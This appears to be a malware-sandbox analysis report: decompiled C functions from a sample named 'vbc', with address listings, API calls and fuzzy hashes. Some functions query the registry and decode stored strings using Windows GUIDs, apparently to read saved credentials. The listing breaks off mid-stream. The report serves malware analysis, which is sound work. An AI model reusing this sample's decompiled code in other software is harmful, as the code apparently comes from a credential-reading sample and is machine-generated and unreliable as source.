                                                                                                                                                    			E0040EDAC() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x417520 == 0) {
					_t1 = LoadLibraryA("shell32.dll");
					 *0x417520 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathA");
						 *0x41751c = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                                                                                    0x0040edb3
                                                                                                                                                    0x0040edba
                                                                                                                                                    0x0040edc2
                                                                                                                                                    0x0040edc7
                                                                                                                                                    0x0040edcf
                                                                                                                                                    0x0040edd5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040edd5
                                                                                                                                                    0x0040edc7
                                                                                                                                                    0x0040edda

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,75144DE0,?,00000000), ref: 0040EDBA
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                    • API String ID: 2574300362-543337301
                                                                                                                                                    • Opcode ID: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
                                                                                                                                                    • Instruction ID: 9298da647e7f97f850720a93b521a1101e1548fa407b312faad19db7241a3124
                                                                                                                                                    • Opcode Fuzzy Hash: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
                                                                                                                                                    • Instruction Fuzzy Hash: 4BD0C970649202EFC7008F21AE097813ABABB18703F10C537A506E1AA0F7B88190CF5C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040FE05 Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                    			E0040FE05(intOrPtr* __esi, void* __eflags) {
				void* _t27;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t44;

				_t44 = __esi;
				 *__esi = 0x414288;
				_t27 = E00406549(0x46c, __esi);
				_push(0x20);
				L004115D0();
				if(_t27 == 0) {
					_t28 = 0;
				} else {
					_t28 = E00406A2C(_t27);
				}
				_push(0x20);
				 *((intOrPtr*)(_t44 + 0x450)) = _t28;
				L004115D0();
				if(_t28 == 0) {
					_t29 = 0;
				} else {
					_t29 = E00406A2C(_t28);
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x454)) = _t29;
				L004115D0();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x458)) = _t29;
				L004115D0();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x45c)) = _t29;
				L004115D0();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				 *((intOrPtr*)(_t44 + 0x460)) = _t29;
				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x450)) + 0x14)) = 0x2000;
				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x454)) + 0x14)) = 0x2000;
				 *((intOrPtr*)(_t44 + 0x3c)) = 1;
				 *((intOrPtr*)(_t44 + 0x40)) = 1;
				 *((intOrPtr*)(_t44 + 0x44)) = 1;
				 *((intOrPtr*)(_t44 + 0x48)) = 1;
				return _t44;
			}







                                                                                                                                                    0x0040fe05
                                                                                                                                                    0x0040fe0d
                                                                                                                                                    0x0040fe13
                                                                                                                                                    0x0040fe18
                                                                                                                                                    0x0040fe1a
                                                                                                                                                    0x0040fe25
                                                                                                                                                    0x0040fe2e
                                                                                                                                                    0x0040fe27
                                                                                                                                                    0x0040fe27
                                                                                                                                                    0x0040fe27
                                                                                                                                                    0x0040fe30
                                                                                                                                                    0x0040fe32
                                                                                                                                                    0x0040fe38
                                                                                                                                                    0x0040fe40
                                                                                                                                                    0x0040fe49
                                                                                                                                                    0x0040fe42
                                                                                                                                                    0x0040fe42
                                                                                                                                                    0x0040fe42
                                                                                                                                                    0x0040fe4b
                                                                                                                                                    0x0040fe4d
                                                                                                                                                    0x0040fe53
                                                                                                                                                    0x0040fe60
                                                                                                                                                    0x0040fe72
                                                                                                                                                    0x0040fe62
                                                                                                                                                    0x0040fe62
                                                                                                                                                    0x0040fe65
                                                                                                                                                    0x0040fe67
                                                                                                                                                    0x0040fe6a
                                                                                                                                                    0x0040fe6d
                                                                                                                                                    0x0040fe6d
                                                                                                                                                    0x0040fe74
                                                                                                                                                    0x0040fe76
                                                                                                                                                    0x0040fe7c
                                                                                                                                                    0x0040fe84
                                                                                                                                                    0x0040fe96
                                                                                                                                                    0x0040fe86
                                                                                                                                                    0x0040fe86
                                                                                                                                                    0x0040fe89
                                                                                                                                                    0x0040fe8b
                                                                                                                                                    0x0040fe8e
                                                                                                                                                    0x0040fe91
                                                                                                                                                    0x0040fe91
                                                                                                                                                    0x0040fe98
                                                                                                                                                    0x0040fe9a
                                                                                                                                                    0x0040fea0
                                                                                                                                                    0x0040fea8
                                                                                                                                                    0x0040feba
                                                                                                                                                    0x0040feaa
                                                                                                                                                    0x0040feaa
                                                                                                                                                    0x0040fead
                                                                                                                                                    0x0040feaf
                                                                                                                                                    0x0040feb2
                                                                                                                                                    0x0040feb5
                                                                                                                                                    0x0040feb5
                                                                                                                                                    0x0040fec2
                                                                                                                                                    0x0040fecd
                                                                                                                                                    0x0040fed6
                                                                                                                                                    0x0040fedd
                                                                                                                                                    0x0040fee0
                                                                                                                                                    0x0040fee3
                                                                                                                                                    0x0040fee6
                                                                                                                                                    0x0040feec

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                    • Opcode ID: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
                                                                                                                                                    • Instruction ID: d938b1c2a289ef47e5423cea375f2860c04713c819a512dfc676868f3ea794ac
                                                                                                                                                    • Opcode Fuzzy Hash: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
                                                                                                                                                    • Instruction Fuzzy Hash: CC3146B0A107008FD7609F3AD845666FBE4EF80355F25887FD20ADB6B2E7B8D4448B59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040BD0B Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040BD0B(void* __edi, void* __esi, void* _a4) {
				signed int _t13;
				signed int _t25;
				int _t26;
				char* _t30;
				void* _t31;
				void* _t33;
				void* _t35;

				_t35 = __esi;
				_t25 = 0x3f;
				_t13 =  *(__esi + 0x10) >> 0x00000003 & _t25;
				_t30 = __esi + 0x18 + _t13;
				 *_t30 = 0x80;
				_t26 = _t25 - _t13;
				_t31 = _t30 + 1;
				if(_t26 >= 8) {
					memset(_t31, 0, _t26 + 0xfffffff8);
				} else {
					memset(_t31, 0, _t26);
					_t33 = __esi + 0x18;
					E0040BD8A(_t33, __esi);
					memset(_t33, 0, 0x38);
				}
				 *((intOrPtr*)(_t35 + 0x50)) =  *((intOrPtr*)(_t35 + 0x10));
				 *((intOrPtr*)(_t35 + 0x54)) =  *((intOrPtr*)(_t35 + 0x14));
				E0040BD8A(_t35 + 0x18, _t35);
				memcpy(_a4, _t35, 0x10);
				return memset(_t35, 0, 4);
			}










                                                                                                                                                    0x0040bd0b
                                                                                                                                                    0x0040bd13
                                                                                                                                                    0x0040bd14
                                                                                                                                                    0x0040bd16
                                                                                                                                                    0x0040bd1a
                                                                                                                                                    0x0040bd1d
                                                                                                                                                    0x0040bd1f
                                                                                                                                                    0x0040bd23
                                                                                                                                                    0x0040bd52
                                                                                                                                                    0x0040bd25
                                                                                                                                                    0x0040bd2a
                                                                                                                                                    0x0040bd2f
                                                                                                                                                    0x0040bd36
                                                                                                                                                    0x0040bd40
                                                                                                                                                    0x0040bd48
                                                                                                                                                    0x0040bd5d
                                                                                                                                                    0x0040bd63
                                                                                                                                                    0x0040bd6b
                                                                                                                                                    0x0040bd77
                                                                                                                                                    0x0040bd89

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                    • Opcode ID: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                                                                                                                    • Instruction ID: 14e83d3a51f9c3b731822f35bbce0da2433a64988b134a744f8d54487411a0b4
                                                                                                                                                    • Opcode Fuzzy Hash: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                                                                                                                    • Instruction Fuzzy Hash: 6F01F5B1680B0026D2356B26CC02F9A77A5AFA0714F000B1EF643666D1D7ACE244869C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040246C Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040246C(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
				void _v2058;
				char _v2060;
				char _v2069;
				char _v2070;
				char _v2071;
				char _v2072;
				char _v3086;
				signed char _v3090;
				char _v3091;
				char _v3092;
				char* _v3096;
				char _v3100;
				short* _v3104;
				int _v3108;
				char _v3112;
				void* __ebx;
				void* _t49;
				signed int _t61;
				short* _t76;
				void* _t83;
				signed int _t87;
				void* _t90;

				_t83 = __eax;
				_t73 = 0;
				 *_a12 = 0;
				_v3112 = 0x400;
				_t49 = E0040EBA3(__ecx, _a4, _a8,  &_v3092,  &_v3112);
				_t90 = (_t87 & 0xfffffff8) - 0xc28 + 0x10;
				if(_t49 == 0) {
					_v2069 = 0;
					_v2070 = 0;
					_v2071 = 0;
					_v2072 = 0;
					if(_v3092 != 1) {
						if(_v3092 == 2 &&  *((intOrPtr*)(_t83 + 0xa94)) != 0) {
							_v3100 = _v3112 - 1;
							_v3096 =  &_v3091;
							if(E00404811(_t83 + 0x890,  &_v3100, 0,  &_v3108) != 0) {
								WideCharToMultiByte(0, 0, _v3104, _v3108, _a12, 0x7f, 0, 0);
								LocalFree(_v3104);
							}
						}
					} else {
						if( *((intOrPtr*)(_t83 + 0x888)) != 0) {
							if(_a16 == 0) {
								E0040E988(_a12, _t83 + 0x87c,  &_v3090, 0x7f, 0);
							} else {
								_v2060 = 0;
								memset( &_v2058, 0, 0x800);
								_t90 = _t90 + 0xc;
								_t76 =  &_v2060;
								E0040E988(_t76, _t83 + 0x87c,  &_v3091, 0x400, 1);
								WideCharToMultiByte(0, 0, _t76, 0xffffffff, _a12, 0x7f, 0, 0);
							}
							_t73 = 0;
						}
						_t79 = _a12;
						if( *_a12 == _t73 && _v3112 >= 7 && _v3092 == 1 && _v3091 == 1) {
							_t61 = _v3090 & 0x000000ff;
							if(_t61 > 1 && _v3112 >= _t61 + 6) {
								E00401DFD(_t79,  &_v3086, _t61);
							}
						}
					}
				}
				return 0 |  *_a12 != _t73;
			}

























                                                                                                                                                    0x0040247a
                                                                                                                                                    0x0040247f
                                                                                                                                                    0x00402481
                                                                                                                                                    0x00402490
                                                                                                                                                    0x0040249b
                                                                                                                                                    0x004024a0
                                                                                                                                                    0x004024a5
                                                                                                                                                    0x004024b0
                                                                                                                                                    0x004024b7
                                                                                                                                                    0x004024be
                                                                                                                                                    0x004024c5
                                                                                                                                                    0x004024cc
                                                                                                                                                    0x0040259e
                                                                                                                                                    0x004025ad
                                                                                                                                                    0x004025b5
                                                                                                                                                    0x004025d1
                                                                                                                                                    0x004025e4
                                                                                                                                                    0x004025ee
                                                                                                                                                    0x004025ee
                                                                                                                                                    0x004025d1
                                                                                                                                                    0x004024d2
                                                                                                                                                    0x004024d8
                                                                                                                                                    0x004024dd
                                                                                                                                                    0x00402546
                                                                                                                                                    0x004024df
                                                                                                                                                    0x004024ed
                                                                                                                                                    0x004024f5
                                                                                                                                                    0x004024fa
                                                                                                                                                    0x00402510
                                                                                                                                                    0x00402517
                                                                                                                                                    0x0040252c
                                                                                                                                                    0x0040252c
                                                                                                                                                    0x0040254b
                                                                                                                                                    0x0040254b
                                                                                                                                                    0x0040254d
                                                                                                                                                    0x00402552
                                                                                                                                                    0x00402575
                                                                                                                                                    0x0040257d
                                                                                                                                                    0x0040258f
                                                                                                                                                    0x00402594
                                                                                                                                                    0x0040257d
                                                                                                                                                    0x00402552
                                                                                                                                                    0x004024cc
                                                                                                                                                    0x00402603

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 0040252C
                                                                                                                                                    • memset.MSVCRT ref: 004024F5
                                                                                                                                                      • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                                                                                                                      • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                                                                                                                      • Part of subcall function 0040E988: memcpy.MSVCRT ref: 0040EA04
                                                                                                                                                      • Part of subcall function 0040E988: CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 004025E4
                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 004025EE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3503910906-0
                                                                                                                                                    • Opcode ID: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                                                                                                                    • Instruction ID: 8b275e149f62785490509d2466391155d2af3f8991a5b00387cc308873e1222d
                                                                                                                                                    • Opcode Fuzzy Hash: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                                                                                                                    • Instruction Fuzzy Hash: 7041B4B1408384BFD711DB608D44AEBBBDCBB48308F44493EFA98A21D1D678DA54DB5A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040B3C4 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                                    			E0040B3C4(intOrPtr __ecx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void _v263;
				char _v264;
				void* __edi;
				void* __esi;
				signed int _t42;
				signed int _t45;
				intOrPtr* _t60;
				signed char _t62;
				intOrPtr _t63;
				int _t65;

				_t61 = __ecx;
				_t60 = _a8;
				_t63 = __ecx;
				_v8 = __ecx;
				if( *(_t60 + 4) == 0x103 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffff4) {
					_t42 = E00408BA0( *((intOrPtr*)(__ecx + 0x370)), _t60);
					 *((intOrPtr*)(_t63 + 0x10c)) = 1;
					 *(_t63 + 0x110) = _t42;
				}
				if(_a4 == 0x101 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffffe &&  *((intOrPtr*)(_t60 + 0xc)) == 1) {
					_v264 = 0;
					memset( &_v263, 0, 0xff);
					E00401000(_t61,  &_v264, 0x412440);
					_t42 = E00406523( *((intOrPtr*)(_v8 + 0x108)),  &_v264);
					_t63 = _v8;
				}
				_t65 = 0;
				if( *((intOrPtr*)(_t60 + 8)) == 0xfffffdf8) {
					_t42 = SendMessageA( *(_t63 + 0x118), 0x423, 0, 0);
					if( *_t60 == _t42) {
						_t42 = GetMenuStringA( *(_t63 + 0x11c),  *(_t60 + 4), _t60 + 0x10, 0x4f, 0);
						 *((intOrPtr*)(_t60 + 0x60)) = 0;
					}
				}
				if(_a4 != 0x103) {
					L27:
					return _t42;
				} else {
					_t80 =  *((intOrPtr*)(_t60 + 8)) - 0xfffffffd;
					if( *((intOrPtr*)(_t60 + 8)) == 0xfffffffd) {
						_t42 = E0040AEAA(_t61, _t63, _t63, _t80);
						_t65 = 0;
					}
					if( *((intOrPtr*)(_t60 + 8)) == 0xffffff94) {
						_t42 = E00408ACB( *(_t60 + 0x10), _t61,  *((intOrPtr*)(_t63 + 0x370)), _t65);
						_t65 = 0;
					}
					if( *((intOrPtr*)(_t60 + 8)) != 0xffffff9b) {
						goto L27;
					} else {
						if( *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x370)) + 0x1b8)) == _t65) {
							_t62 = 2;
							_t45 =  *(_t60 + 0x14) & _t62;
							__eflags = _t45;
							if(_t45 == 0) {
								L20:
								__eflags = _t45 - _t62;
								if(_t45 == _t62) {
									L23:
									_t42 = 0;
									__eflags = 0;
									L24:
									if(_t42 == _t65) {
										goto L27;
									}
									_t42 = _t63 + 0x25c;
									if( *_t42 != _t65) {
										goto L27;
									}
									 *_t42 = 1;
									return PostMessageA( *(_t63 + 0x108), 0x402, _t65, _t65);
								}
								__eflags =  *(_t60 + 0x18) & _t62;
								if(( *(_t60 + 0x18) & _t62) == 0) {
									goto L23;
								}
								L22:
								_t42 = 1;
								goto L24;
							}
							__eflags =  *(_t60 + 0x18) & _t62;
							if(( *(_t60 + 0x18) & _t62) == 0) {
								goto L22;
							}
							goto L20;
						}
						asm("sbb eax, eax");
						_t42 =  ~( ~(( *(_t60 + 0x18) ^  *(_t60 + 0x14)) & 0x0000f002));
						goto L24;
					}
				}
			}














                                                                                                                                                    0x0040b3c4
                                                                                                                                                    0x0040b3ce
                                                                                                                                                    0x0040b3da
                                                                                                                                                    0x0040b3dc
                                                                                                                                                    0x0040b3df
                                                                                                                                                    0x0040b3ef
                                                                                                                                                    0x0040b3f4
                                                                                                                                                    0x0040b3fe
                                                                                                                                                    0x0040b3fe
                                                                                                                                                    0x0040b40b
                                                                                                                                                    0x0040b427
                                                                                                                                                    0x0040b42e
                                                                                                                                                    0x0040b43e
                                                                                                                                                    0x0040b44f
                                                                                                                                                    0x0040b454
                                                                                                                                                    0x0040b457
                                                                                                                                                    0x0040b45a
                                                                                                                                                    0x0040b463
                                                                                                                                                    0x0040b472
                                                                                                                                                    0x0040b47a
                                                                                                                                                    0x0040b48c
                                                                                                                                                    0x0040b492
                                                                                                                                                    0x0040b492
                                                                                                                                                    0x0040b47a
                                                                                                                                                    0x0040b49c
                                                                                                                                                    0x0040b539
                                                                                                                                                    0x0040b539
                                                                                                                                                    0x0040b4a2
                                                                                                                                                    0x0040b4a2
                                                                                                                                                    0x0040b4a6
                                                                                                                                                    0x0040b4aa
                                                                                                                                                    0x0040b4af
                                                                                                                                                    0x0040b4af
                                                                                                                                                    0x0040b4b5
                                                                                                                                                    0x0040b4c1
                                                                                                                                                    0x0040b4c6
                                                                                                                                                    0x0040b4c6
                                                                                                                                                    0x0040b4cc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b4ce
                                                                                                                                                    0x0040b4da
                                                                                                                                                    0x0040b4f4
                                                                                                                                                    0x0040b4f5
                                                                                                                                                    0x0040b4f5
                                                                                                                                                    0x0040b4f7
                                                                                                                                                    0x0040b4fe
                                                                                                                                                    0x0040b4fe
                                                                                                                                                    0x0040b500
                                                                                                                                                    0x0040b50c
                                                                                                                                                    0x0040b50c
                                                                                                                                                    0x0040b50c
                                                                                                                                                    0x0040b50e
                                                                                                                                                    0x0040b510
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b512
                                                                                                                                                    0x0040b51a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b529
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b52f
                                                                                                                                                    0x0040b502
                                                                                                                                                    0x0040b505
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b507
                                                                                                                                                    0x0040b509
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b509
                                                                                                                                                    0x0040b4f9
                                                                                                                                                    0x0040b4fc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b4fc
                                                                                                                                                    0x0040b4e9
                                                                                                                                                    0x0040b4eb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b4eb
                                                                                                                                                    0x0040b4cc

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040B42E
                                                                                                                                                    • SendMessageA.USER32 ref: 0040B472
                                                                                                                                                    • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040B48C
                                                                                                                                                    • PostMessageA.USER32 ref: 0040B52F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3798638045-0
                                                                                                                                                    • Opcode ID: c3aa6ddd336313682f51672c6081f6f8049648b04dcffedc212cd8d1236b5249
                                                                                                                                                    • Instruction ID: e99ea3cd5ae45d968ce1bb78ba156cefd6297a3afaf0c32d246f8b1269deedf3
                                                                                                                                                    • Opcode Fuzzy Hash: c3aa6ddd336313682f51672c6081f6f8049648b04dcffedc212cd8d1236b5249
                                                                                                                                                    • Instruction Fuzzy Hash: 5041F430600611EBCB25DF24CC85A96B7A4FF14324F1482B6E958AB2C6C378DE91CBDC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040A119 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E0040A119(void* __eax, void* __eflags, char* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				signed int _t63;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t79;
				void* _t84;
				signed int _t86;
				char* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t106;
				void* _t107;

				_t84 = __eax;
				E0040892D(__eax, __eflags);
				_t86 = 0;
				_v12 = 0;
				while(1) {
					_t98 = _a4;
					if( *((intOrPtr*)(_t86 + _t98)) - 0x30 > 9) {
						break;
					}
					_t86 = _t86 + 1;
					if(_t86 < 1) {
						continue;
					}
					if(strlen(_t98) >= 3) {
						break;
					}
					_t79 = atoi(_a4);
					if(_t79 >= 0 && _t79 <  *((intOrPtr*)(_t84 + 0x20))) {
						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t84 + 0x24)) + _t79 * 4) * 0x14 +  *((intOrPtr*)(_t84 + 0x1b4))));
					}
					L21:
					if(_a8 != 0) {
						_v12 = _v12 | 0x00001000;
					}
					_t63 = _v12;
					 *0x41748c =  *0x41748c + 1;
					 *((intOrPtr*)(0x417490 +  *0x41748c * 4)) = _t63;
					return _t63;
				}
				_t104 = 0;
				__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
				_v16 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
					L14:
					_t100 = 0;
					__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
					_v8 = 0;
					if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
						L20:
						goto L21;
					}
					_t106 = 0;
					__eflags = 0;
					do {
						_v20 = E004069D2(0, _a4);
						_t67 = E004069D2(0, _a4);
						__eflags = _v20;
						if(_v20 >= 0) {
							L18:
							_v12 =  *((intOrPtr*)(_t106 +  *((intOrPtr*)(_t84 + 0x1b4))));
							goto L19;
						}
						__eflags = _t67;
						if(_t67 < 0) {
							goto L19;
						}
						goto L18;
						L19:
						_v8 = _v8 + 1;
						_t100 = _t100 + 0x10;
						_t106 = _t106 + 0x14;
						__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
					} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
					goto L20;
				}
				_t102 = 0;
				__eflags = 0;
				do {
					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x1b4)) + _t104 + 0x10));
					_push(_a4);
					_push(_t72);
					L004115C4();
					_push(_a4);
					_v20 = _t72;
					_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x34)) + _t102 + 0xc));
					_push(_t74);
					L004115C4();
					_t107 = _t107 + 0x10;
					__eflags = _v20;
					if(_v20 == 0) {
						L11:
						_v12 =  *(_t104 +  *((intOrPtr*)(_t84 + 0x1b4)));
						_v16 = 1;
						goto L12;
					}
					__eflags = _t74;
					if(_t74 != 0) {
						goto L12;
					}
					goto L11;
					L12:
					_v8 = _v8 + 1;
					_t102 = _t102 + 0x10;
					_t104 = _t104 + 0x14;
					__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
				} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
				__eflags = _v16;
				if(_v16 != 0) {
					goto L20;
				}
				goto L14;
			}





















                                                                                                                                                    0x0040a120
                                                                                                                                                    0x0040a122
                                                                                                                                                    0x0040a127
                                                                                                                                                    0x0040a129
                                                                                                                                                    0x0040a12c
                                                                                                                                                    0x0040a12c
                                                                                                                                                    0x0040a136
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a138
                                                                                                                                                    0x0040a13c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a148
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a14d
                                                                                                                                                    0x0040a155
                                                                                                                                                    0x0040a176
                                                                                                                                                    0x0040a176
                                                                                                                                                    0x0040a257
                                                                                                                                                    0x0040a25c
                                                                                                                                                    0x0040a25e
                                                                                                                                                    0x0040a25e
                                                                                                                                                    0x0040a26b
                                                                                                                                                    0x0040a26e
                                                                                                                                                    0x0040a274
